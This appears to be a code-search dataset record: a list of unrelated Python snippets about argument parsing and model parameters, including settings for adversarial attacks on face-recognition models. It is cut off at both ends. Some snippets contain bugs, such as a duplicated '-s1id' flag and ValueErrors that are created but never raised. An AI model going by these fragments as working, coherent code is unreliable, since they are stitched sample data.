RandomForestClassifier\"\n raise Exception(err)\n \n # If key word arguments for model evaluation metrics are included in the request, get the parameters and values\n if metric_args is not None and len(metric_args) > 0:\n # Transform the string of arguments into a dictionary\n metric_args = utils.get_kwargs(metric_args)\n \n # Get the metric parameters, converting values to the correct data type\n self.model.metric_args = utils.get_kwargs_by_type(metric_args) \n \n # If key word arguments for dimensionality reduction are included in the request, get the parameters and values\n if dim_reduction_args is not None and len(dim_reduction_args) > 0:\n # Transform the string of arguments into a dictionary\n dim_reduction_args = utils.get_kwargs(dim_reduction_args)\n \n # Set dim_reduction arguments that will be used after preprocessing the data\n # The parameters available will depend on the selected dimensionality reduction method\n # Acceptable classes are PCA, KernelPCA, IncrementalPCA, TruncatedSVD\n # More information here: http://scikit-learn.org/stable/modules/classes.html#api-reference\n if 'reduction' in dim_reduction_args:\n self.model.reduction = dim_reduction_args.pop('reduction')\n \n # Get the rest of the dim_reduction parameters, converting values to the correct data type\n self.model.dim_reduction_args = utils.get_kwargs_by_type(dim_reduction_args) \n else:\n err = \"Arguments for dimensionality reduction did not include the class e.g. PCA\"\n raise Exception(err)\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(2)", "def __init__(self, **kwargs):\n\n args = {\n 'nobs': None, # Number of observations\n 'npred': None, # Number of predictors\n 'nrelpred': None, # Number of relevant predictors\n 'relpos': None, # Position of relevant predictor components\n 'gamma': None, # Decay factor of eigenvalue of predictor\n 'rsq': None, # Coefficient of determination\n 'sim_type': None, # Type of simulation: univariate, bivariate, multivariate\n }\n for key, value in args.items():\n setattr(self, key, value)\n\n for key, value in kwargs.items():\n setattr(self, key, value)", "def pre_build_args(self, args):\n args = super(SubtitlesTrainer, self).pre_build_args(args)\n # Set up method specific model and training args\n if args.method in ['b-skip', 'f-skip', 'b-mask', 'f-mask']:\n # No direct connection from features to z in encoder\n args.model_args['feat_to_z'] = True\n # Do not add unimodal ELBO training loss for RNN methods\n args.train_args['uni_loss'] = True\n return args", "def fixture_wrapper_arguments():\n n_features = 9\n classes = [\"a\", \"b\", \"c\"]\n\n return n_features, classes", "def get_arguments():\n\n # Creates the ArgumentParser\n parser = argparse.ArgumentParser(usage='Creates an ensemble of classifiers based on majority voting.')\n\n # Adds a dataset argument with pre-defined choices\n parser.add_argument('dataset', help='Dataset identifier', choices=['RSDataset', 'RSSCN7', 'UCMerced_LandUse'])\n\n return parser.parse_args()", "def add_required_arguments(self, *args):\n self._add_sample_specific_arguments(True, *args)", "def required_parameters(self):\n return ['seed', 'run_params']", "def define_parameters(self):\n self.add_argument('--prefix', dest='prefix', type=str, optional=False,\n help='prefix for file names')\n self.add_argument('--sleepLength',\n dest = 'sleepLength',\n type = str,\n optional = True,\n help ='time to sleep before performing plugin action',\n default = '0')", "def 
define_parameters(self):\n\n self.add_argument('--input1',dest='input1',type=str,optional=False,\n help='What file do you want to upload?')\n self.add_argument('--input2',dest='input2',type=str,optional=False,\n help='What file do you want to upload?')", "def test_intent_classifier_set_params(self):\n pass", "def test_arguments(self):\n\n h.test_function_arguments(\n func=BaseTransformer.fit,\n expected_arguments=[\"self\", \"X\", \"y\"],\n expected_default_values=(None,),\n )", "def args(self, args):\n self._instructions_setter('ARG', args)", "def initialize():\n\n parser = build_arg_parser()\n par = parser.parse_known_args()[0]\n\n # Main arguments.\n set('run_mode', par.run_mode)\n set('input_files', par.image)\n\n # Sub-parser specific arguments.\n if par.run_mode == 'train':\n\n set('batch_size', par.batch_size)\n set('drop', par.drop)\n set('epochs', par.epochs)\n set('model', par.model)\n set('level', par.level)\n set('vfrac', par.vfrac)\n set('data_augm', par.data_augm)\n set('summary', par.summary)\n set('outdir', par.outdir)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n set('discriminator', par.discriminator)\n\n elif par.run_mode == 'predict':\n\n set('tile_edge', par.edge)\n set('model', par.model)\n set('save_conv2d_kernels', par.save_conv2d_kernels) \n set('save_conv2d_outputs', par.save_conv2d_outputs) \n set('colormap', par.colormap)\n # Parameters associated with super-resolution. \n set('super_resolution', par.super_resolution)\n set('generator', par.generator)\n\n elif par.run_mode == 'diagnose': \n \n set('model', par.model) \n \n else:\n \n pass", "def parameters(self):", "def add_args(parser):\n rescore_add_args(parser)\n parser.add_argument(\n \"--rl-weight\",\n type=float,\n default=0.1,\n help=\"trade-off coefficient of rl loss\",\n )\n parser.add_argument(\n \"--rl-num-trajectory\",\n type=int,\n default=3,\n help=\"num trajectory in rl training\",\n )", "def __add_arguments__(cls, parser):", "def set_params(self, *arg):\n pass", "def handle_arguments():\n # process the command options\n parser = argparse.ArgumentParser()\n parser.add_argument('images', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\images.npy\"')\n parser.add_argument('labels', type=str, help='provide path in style: '\n r'\"kaggle\\input\\bengaliai-cv19\\labels.csv\"')\n parser.add_argument('-t', '--test_ratio', type=float, default=0.2,\n help='proportion of data for testing, default: 0.2')\n parser.add_argument('-s', '--seed', type=int, default=None, help='seed '\n 'used for consistent data splitting, default: None')\n parser.add_argument('-a', '--data_augmentation', action='store_true',\n help='switch to augment the images')\n drop_info_fns = ['cutout', 'gridmask', 'None'] # info dropping algorithms\n parser.add_argument('-d', '--drop_info_fn', type=str, choices=drop_info_fns,\n default=None, help='whether cutout, GridMask, or no '\n 'information dropping algorithm is used, default: None')\n parser.add_argument('-c', '--class_balancing', action='store_true',\n help='switch to perform class balancing')\n parser.add_argument('-b', '--batch_size', type=int, default=32,\n help='batch size of DataLoader objects, default: 32')\n parser.add_argument('-l', '--label_smoothing', action='store_true',\n help='switch to use soft targets in loss computation')\n parser.add_argument('-e', '--epochs', type=int, default=50, help='number '\n 'of iterations over training data, default: 50')\n 
parser.add_argument('-m', '--model', type=str, default='model.pt',\n help='path to save trained model, default: \"model.pt\"')\n\n # parse and print arguments\n args = parser.parse_args()\n for arg in vars(args):\n print(f'{arg.upper()}: {getattr(args, arg)}')\n\n return args", "def _folium_kwargs(self):", "def set_params(self, **params):\n if('threshold' in params.keys()):\n self.threshold = params['threshold']\n if('subsample' in params.keys()):\n self.subsample = params['subsample']\n if('estimator' in params.keys()):\n self.estimator = params['estimator']\n if('n_folds' in params.keys()):\n self.n_folds = params['n_folds']\n if('stratify' in params.keys()):\n self.stratify = params['stratify']\n if('random_state' in params.keys()):\n self.random_state = params['random_state']\n if('n_jobs' in params.keys()):\n self.n_jobs = params['n_jobs']", "def set_parameters(api_name='',\r\n targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='large',\r\n loss_type='triplet',\r\n dataset_type='vgg',\r\n target_model='large',\r\n target_loss='center',\r\n target_dataset='VGG',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=20,\r\n binary_steps=5,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=15.0,\r\n amplification=6.0,\r\n granularity='normal',\r\n whitebox_target=False,\r\n pair_flag='false'):\r\n \r\n params = {}\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['target_model'] = target_model\r\n params['target_loss'] = target_loss\r\n params['target_dataset'] = target_dataset\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['test_dir'] = TEST_DIR\r\n params['full_dir'] = FULL_DIR\r\n params['whitebox_target'] = whitebox_target\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['pair_flag'] = string_to_bool(pair_flag)\r\n params['api_name'] = api_name\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if dataset_type == 'vggsmall' and not whitebox_target:\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n ValueError('ValueError: Super interpolation 
not yet implemented.')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if granularity == 'fine':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 20.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'normal':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 10.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.5)\r\n elif granularity == 'coarse':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 5.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'coarser':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarsest':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 1.0)\r\n elif granularity == 'single':\r\n params['margin_list'] = np.array([margin])\r\n params['amp_list'] = np.array([amplification])\r\n elif granularity == 'fine-tuned':\r\n params['margin_list'] = np.arange(10.0, margin, 1.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.2)\r\n elif granularity == 'coarse-single':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.array([1.0])\r\n elif granularity == 'api-eval':\r\n params['margin_list'] = np.arange(0.0, margin, margin / 3.0)\r\n params['amp_list'] = np.arange(1.0, amplification, 0.8)\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [fine, normal, coarse, coarser, single].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = '_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['target_model_name'] = '{}_{}_{}'.format(target_model, target_loss, target_dataset)\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n params['directory_path'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/full'.format(params['attack_loss']))\r\n params['directory_path_crop'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/crop'.format(params['attack_loss']))\r\n params['directory_path_npz'] = os.path.join(ROOT,\r\n OUT_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n params['api_path'] = os.path.join(ROOT,\r\n API_DIR,\r\n params['attack_name'],\r\n params['model_name'],\r\n '{}_loss/npz'.format(params['attack_loss']))\r\n if params['mean_loss'] == 'embedding':\r\n params['directory_path'] += '_mean'\r\n params['directory_path_crop'] += '_mean'\r\n params['directory_path_npz'] += '_mean'\r\n params['api_path'] += '_mean'\r\n\r\n return params", "def configure_args(self):\n super(InstaApriori, self).configure_args()\n self.add_passthru_arg('-iteration', type=int, help=\"The current iteration. 
Not used as a command line argument\")\n self.add_passthru_arg('--k', type=int, default=3, help=\"Specify the maximum size of itemsets to find\")\n self.add_passthru_arg('--s', type=float, help=\"Specify the minimum support threshold\")\n self.add_passthru_arg('--c', type=float, default=0, help=\"Specify the minimum confidence threshold\")\n self.add_file_arg('--f', default='frequent.txt',\n help=\"Specify the name of the file used to store frequent itemsets\")", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"Rdy[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rbk[1.,0.0,10.0]\");\n self.modelBuilder.doVar(\"Rqcd_emu[1,0.0,10.0]\");\n self.modelBuilder.doSet(\"POI\",\"Rbk,Rdy,Rqcd_emu\")", "def parameters(self):\n pass", "def predict(self, **kwargs):\n raise NotImplementedError", "def __init__(**params):", "def set_parameters(targeted_flag='true',\r\n tv_flag='false',\r\n hinge_flag='true',\r\n cos_flag='false',\r\n interpolation='bilinear',\r\n model_type='small',\r\n loss_type='center',\r\n dataset_type='vgg',\r\n attack='CW',\r\n norm='2',\r\n epsilon=0.1,\r\n iterations=100,\r\n binary_steps=8,\r\n learning_rate=0.01,\r\n epsilon_steps=0.01,\r\n init_const=0.3,\r\n mean_loss='embeddingmean',\r\n batch_size=-1,\r\n margin=5.0,\r\n amplification=2.0):\r\n params = {}\r\n\r\n params['model_type'] = model_type\r\n params['loss_type'] = loss_type\r\n params['dataset_type'] = dataset_type\r\n params['attack'] = attack\r\n params['norm'] = norm\r\n params['epsilon'] = epsilon\r\n params['iterations'] = iterations\r\n params['binary_steps'] = binary_steps\r\n params['learning_rate'] = learning_rate\r\n params['epsilon_steps'] = epsilon_steps\r\n params['init_const'] = init_const\r\n params['mean_loss'] = mean_loss\r\n params['batch_size'] = batch_size\r\n params['targeted_flag'] = string_to_bool(targeted_flag)\r\n params['tv_flag'] = string_to_bool(tv_flag)\r\n params['hinge_flag'] = string_to_bool(hinge_flag)\r\n params['cos_flag'] = string_to_bool(cos_flag)\r\n params['margin'] = margin\r\n params['amp'] = amplification\r\n\r\n if model_type == 'small' and loss_type == 'center':\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = -1.0\r\n else:\r\n params['pixel_max'] = 1.0\r\n params['pixel_min'] = 0.0\r\n\r\n if (dataset_type == 'vggsmall'):\r\n params['align_dir'] = VGG_ALIGN_160_DIR\r\n params['test_dir'] = VGG_TEST_DIR\r\n elif model_type == 'large' or dataset_type == 'casia':\r\n params['align_dir'] = ALIGN_160_DIR\r\n elif model_type == 'small':\r\n params['align_dir'] = ALIGN_96_DIR\r\n else:\r\n ValueError('ValueError: Argument must be either \"small\" or \"large\".')\r\n \r\n if interpolation == 'nearest':\r\n params['interpolation'] = cv2.INTER_NEAREST\r\n elif interpolation == 'bilinear':\r\n params['interpolation'] = cv2.INTER_LINEAR\r\n elif interpolation == 'bicubic':\r\n params['interpolation'] = cv2.INTER_CUBIC\r\n elif interpolation == 'lanczos':\r\n params['interpolation'] = cv2.INTER_LANCZOS4\r\n elif interpolation == 'super':\r\n print('finish later')\r\n else:\r\n raise ValueError('ValueError: Argument must be of the following, [nearest, bilinear, bicubic, lanczos, super].')\r\n\r\n if params['hinge_flag']:\r\n params['attack_loss'] = 'hinge'\r\n else:\r\n params['attack_loss'] = 'target'\r\n if not params['targeted_flag']:\r\n params['attack_loss'] = 'target'\r\n if norm == 'inf':\r\n norm_name = 'i'\r\n else:\r\n norm_name = '2'\r\n if params['tv_flag']:\r\n tv_name = '_tv'\r\n else:\r\n tv_name = ''\r\n if params['cos_flag']:\r\n cos_name = 
'_cos'\r\n else:\r\n cos_name = ''\r\n\r\n params['model_name'] = '{}_{}'.format(model_type, loss_type)\r\n if dataset_type == 'casia' or dataset_type == 'vggsmall':\r\n params['model_name'] = dataset_type\r\n params['attack_name'] = '{}_l{}{}{}'.format(attack.lower(), norm_name, tv_name, cos_name)\r\n\r\n return params", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def load_args():\n parser = argparse.ArgumentParser(description=\"Classify and predict digits using the mnist dataset\")\n parser.add_argument('mode', help='the mode to run in: fit, model or predict')\n parser.add_argument('--algo', help='which algorithm to use: RandomForest, KNN')\n return parser.parse_args()", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def setup_args():\n parser = ParlaiParser()\n parser.add_argument(\n '-n',\n '--num-episodes',\n default=-1,\n type=int,\n help='Total number of episodes to convert, -1 to convert all examples',\n )\n parser.add_argument(\n '-of',\n '--outfile',\n default=None,\n type=str,\n help='Output file where to save, by default will be created in /tmp',\n )\n parser.add_argument(\n '-s1id', '--speaker-0-id', type=str, help='Speaker id of agent who speaks first'\n )\n parser.add_argument(\n '-s1id',\n '--speaker-1-id',\n type=str,\n help='Speaker id of agent who speaks second',\n )\n parser.add_argument(\n '--prepended-context',\n type='bool',\n default=False,\n help='specify if the context is prepended to the first act',\n )\n parser.add_argument('-ltim', '--log-every-n-secs', type=float, default=10)\n parser.set_defaults(datatype='train:ordered')\n\n return parser", "def load_arguments(parser):\n\n\t# paths\n\tparser.add_argument('--train_path_src', type=str, required=True, help='train src dir')\n\tparser.add_argument('--train_path_tgt', type=str, required=True, help='train tgt dir')\n\tparser.add_argument('--path_vocab_src', type=str, required=True, help='vocab src dir')\n\tparser.add_argument('--path_vocab_tgt', type=str, required=True, help='vocab tgt dir')\n\tparser.add_argument('--dev_path_src', type=str, default=None, help='dev src dir')\n\tparser.add_argument('--dev_path_tgt', type=str, default=None, help='dev tgt dir')\n\tparser.add_argument('--save', type=str, required=True, help='model save dir')\n\tparser.add_argument('--load', type=str, default=None, help='model load dir')\n\tparser.add_argument('--load_embedding_src', type=str, default=None, help='pretrained src embedding')\n\tparser.add_argument('--load_embedding_tgt', type=str, default=None, help='pretrained tgt embedding')\n\tparser.add_argument('--train_attscore_path', type=str, default=None, help='train set reference attention scores')\n\tparser.add_argument('--dev_attscore_path', type=str, default=None, help='dev set reference attention scores')\n\n\t# model\n\tparser.add_argument('--embedding_size_enc', type=int, default=200, help='encoder embedding 
size')\n\tparser.add_argument('--embedding_size_dec', type=int, default=200, help='decoder embedding size')\n\tparser.add_argument('--hidden_size_enc', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_bilstm_enc', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--num_unilstm_enc', type=int, default=0, help='number of encoder unilstm layers')\n\tparser.add_argument('--hidden_size_dec', type=int, default=200, help='encoder hidden size')\n\tparser.add_argument('--num_unilstm_dec', type=int, default=2, help='number of encoder bilstm layers')\n\tparser.add_argument('--hard_att', type=str, default='False', help='use hard attention or not')\n\tparser.add_argument('--att_mode', type=str, default='bahdanau', \\\n\t\t\t\t\t\t\thelp='attention mechanism mode - bahdanau / hybrid / dot_prod')\t\n\tparser.add_argument('--hidden_size_att', type=int, default=1, \\\n\t\t\t\t\t\t\thelp='hidden size for bahdanau / hybrid attention')\n\tparser.add_argument('--hidden_size_shared', type=int, default=200, \\\n\t\t\t\t\t\t\thelp='transformed att output hidden size (set as hidden_size_enc)')\n\tparser.add_argument('--additional_key_size', type=int, default=0, \\\n\t\t\t\t\t\t\thelp='additional attention key size: keys = [values, add_feats]')\n\n\t# train \n\tparser.add_argument('--random_seed', type=int, default=666, help='random seed')\t\n\tparser.add_argument('--max_seq_len', type=int, default=32, help='maximum sequence length')\n\tparser.add_argument('--batch_size', type=int, default=64, help='batch size')\t\n\tparser.add_argument('--embedding_dropout', type=float, default=0.0, help='embedding dropout')\n\tparser.add_argument('--dropout', type=float, default=0.0, help='dropout')\n\tparser.add_argument('--num_epochs', type=int, default=10, help='number of training epoches')\n\tparser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate')\n\tparser.add_argument('--residual', type=str, default='False', help='residual connection')\n\tparser.add_argument('--max_grad_norm', type=float, default=1.0, help='optimiser gradient norm clipping: max grad norm')\t\n\tparser.add_argument('--batch_first', type=str, default='True', help='batch as the first dimension')\n\tparser.add_argument('--use_gpu', type=str, default='False', help='whether or not using GPU')\n\tparser.add_argument('--eval_with_mask', type=str, default='True', help='calc loss excluding padded words')\n\tparser.add_argument('--scheduled_sampling', type=str, default='False', \\\n\t\t\t\t\t \t\thelp='gradually turn off teacher forcing \\\n\t\t\t\t\t \t\t(if True, use teacher_forcing_ratio as the starting point)')\n\n\t# teacher forcing / attention forcing / dual\n\tparser.add_argument('--train_mode', type=str, default='dual', help='train mode; multi | dual | afdynamic')\n\tparser.add_argument('--load_tf', type=str, default=None, help='used with train_mode=af; tf model load dir')\n\tparser.add_argument('--teacher_forcing_ratio', type=float, default=1.0, help='ratio of teacher forcing')\n\tparser.add_argument('--attention_forcing', type=str, default='False', help='whether or not using attention forcing')\n\tparser.add_argument('--attention_loss_coeff', type=float, default=1.0, \\\n\t\t\t\t\t\t\thelp='attention loss coeff, ignored if attention_forcing=False')\n\t\n\t# save and print\n\tparser.add_argument('--checkpoint_every', type=int, default=10, help='save ckpt every n steps')\t\n\tparser.add_argument('--print_every', type=int, default=10, help='print every n 
steps')\t\n\n\treturn parser", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def args():\n\n parser = argparse.ArgumentParser(description=\"Train a maximum entropy model.\")\n parser.add_argument(\"-N\", \"--ngram\", metavar=\"N\", dest=\"ngram\", type=int, default=3, help=\"The length of ngram to be considered (default 3).\")\n parser.add_argument(\"datafile\", type=str,\n help=\"The file name containing the features.\")\n parser.add_argument(\"modelfile\", type=str,\n help=\"The name of the file to which you write the trained model.\")\n args = parser.parse_args()\n\n return args.datafile, args.ngram, args.modelfile", "def __init__(self, *args, **kwargs):\n self.classes = [0,1] # (default to 0/1; replace during training)\n self.theta = np.array([]) # placeholder value before training\n\n if len(args) or len(kwargs): # if we were given optional arguments,\n self.train(*args,**kwargs) # just pass them through to \"train\"", "def setup_args(cls) -> ParlaiParser:\n # we want to later deprecate this for add_cmdline_args", "def parse_args ( self , dataset = None , *args , **kwargs ) :\n _args = []\n for a in args :\n if not isinstance ( a , ROOT.RooCmdArg ) :\n self.error ( 'parse_args: unknown argument type %s/%s, skip' % ( a , type ( a ) ) )\n else : _args.append ( a ) \n\n from ostap.plotting.fit_draw import keys as drawing_options\n\n silent = None\n verbose = None\n \n for k , a in items_loop ( kwargs ) :\n \n klow = k.lower ().replace('_','')\n kup = k.upper ().replace('_','')\n \n ## skip \"drawing\" options \n if klow in drawing_options : continue \n if klow in ( 'draw' ,\n 'drawoption' ,\n 'drawoptions' ) : continue \n \n if isinstance ( a , ROOT.RooCmdArg ) : _args.append ( a )\n \n elif kup in ( 'VERBOSE' , ) and isinstance ( a , bool ) :\n \n if not verbose is None :\n if a != verbose : \n logger.warning ( 'parse_args: Redefine VERBOSE to %s' % a ) \n verbose = a \n if not silent is None :\n if a == silent :\n logger.warning ( 'parse_args: confusing VERBOSE/SILENT %s/%s' % ( a , silent ) )\n silent = not a \n _args.append ( ROOT.RooFit.Verbose ( a ) )\n elif kup in ( 'SILENT' ,\n 'SILENCE' ) and isinstance ( a , bool ) :\n if not silent is None :\n if a != silent : \n logger.warning ( 'parse_args: Redefine SILENT to %s' % a ) \n verbose = a \n if not verbose is None :\n if a == verbose :\n logger.warning ( 'parse_args: confusing SILENT/VERBOSE %s/%s' % ( a , verbose ) )\n verbose = not a\n _args.append ( ROOT.RooFit.Verbose ( not a ) ) \n elif kup in ( 'STRATEGY' , \n 'MINUITSTRATEGY' ,\n 'STRATEGYMINUIT' ) and isinstance ( a , integer_types ) and 0 <= a <= 2 : \n _args.append ( ROOT.RooFit.Strategy ( a ) ) \n elif kup in ( 'PRINTLEVEL' ,\n 'MINUITPRINT' ,\n 'MINUITLEVEL' ) and isinstance ( a , integer_types ) and -1 <= a <= 3 :\n _args.append ( ROOT.RooFit.PrintLevel ( a ) ) \n elif kup in ( 'PRINTEVALERRORS' ,\n 'PRINTERRORS' ,\n 'ERRORSPRINT' ) and isinstance ( a , integer_types ) and -1 <= a :\n _args.append ( ROOT.RooFit.PrintEvalErrors ( a ) ) \n elif kup in ( 'TIMER' ,\n 'TIMING' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Timer ( a ) ) \n elif kup in ( 'WARNING' ,\n 'WARNINGS' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Warnings ( a ) ) \n \n elif kup in ( 'SUMW2' ,\n 'SUMW2ERR' ,\n 'SUMW2ERROR' ,\n 'SUMW2ERRORS' ) and isinstance ( a , bool ) :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: SumW2-flag is 
True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: SumW2-flag is False for weighted dataset') \n\n _args.append ( ROOT.RooFit.SumW2Error( a ) )\n \n elif kup in ( 'ASYMPTOTIC' ,\n 'ASYMPTOTICERR' ,\n 'ASYMPTOTICERROR' ,\n 'ASYMPTOTICERRORS' ) and isinstance ( a , bool ) and 61900 <= root_version_int :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: AsymptoticError-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: AsymptoticError-flag is False for weighted dataset') \n\n if a and root_version_int < 62006 :\n self.warning (\"``Asymptotic=True'' will crash if Title!=Name (ROOT-10668)\")\n \n _args.append ( ROOT.RooFit.AsymptoticError ( a ) )\n \n elif kup in ( 'BATCH' ,\n 'BATCHMODE' ) and isinstance ( a , bool ) and 62000 <= root_version_int :\n _args.append ( ROOT.RooFit.BatchMode ( a ) ) \n elif kup in ( 'EXTENDED' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Extended ( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and isinstance ( a , int ) and 1<= a : \n _args.append ( ROOT.RooFit.NumCPU( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and \\\n isinstance ( a , list_types ) and 2 == len ( a ) and \\\n isinstance ( a[0] , integer_types ) and 1 <= a[1] and \\\n isinstance ( a[1] , integer_types ) and 0 <= a[1] <=3 :\n _args.append ( ROOT.RooFit.NumCPU( a[0] , a[1] ) ) \n \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ,\n 'RANGES' ,\n 'FITRANGES' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.Range ( a ) ) \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , num_types ) \\\n and isinstance ( a[1] , num_types ) \\\n and a[0] < a[1] : \n _args.append ( ROOT.RooFit.Range ( a[0] , a[1] ) )\n elif kup in ( 'MINIMIZER' , ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , string_types ) \\\n and isinstance ( a[1] , string_types ) :\n _args.append ( ROOT.RooFit.Minimizer ( a[0] , a[1] ) ) \n elif kup in ( 'HESSE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Hesse ( a ) )\n elif kup in ( 'INITIALHESSE' ,\n 'INITHESSE' ,\n 'HESSEINIT' ,\n 'HESSEINITIAL' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.InitialHesse ( a ) )\n elif kup in ( 'OPTIMIZE' ,\n 'OPTIMISE' ) and isinstance ( a , integer_types ) :\n _args.append ( ROOT.RooFit.Optimize ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , ROOT.RooArgSet ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , string_types ) \\\n and hasattr ( self , 'params' ) and a in self.params ( dataset ) : \n _v = self.params()[ a ]\n _s = ROOT.RooArgSet ( _v )\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) ) \n elif kup in ( 'MINOS' , ) and not isinstance ( a , string_types ) :\n\n _s = ROOT.RooArgSet()\n _pars = self.params ( dataset ) if hasattr ( self , 'params' ) else ROOT.RooArgSet() \n for v in a :\n if v in _pars and isinstance ( v , string_types ):\n _v = _pars [ v ] \n _s.add ( _v )\n elif 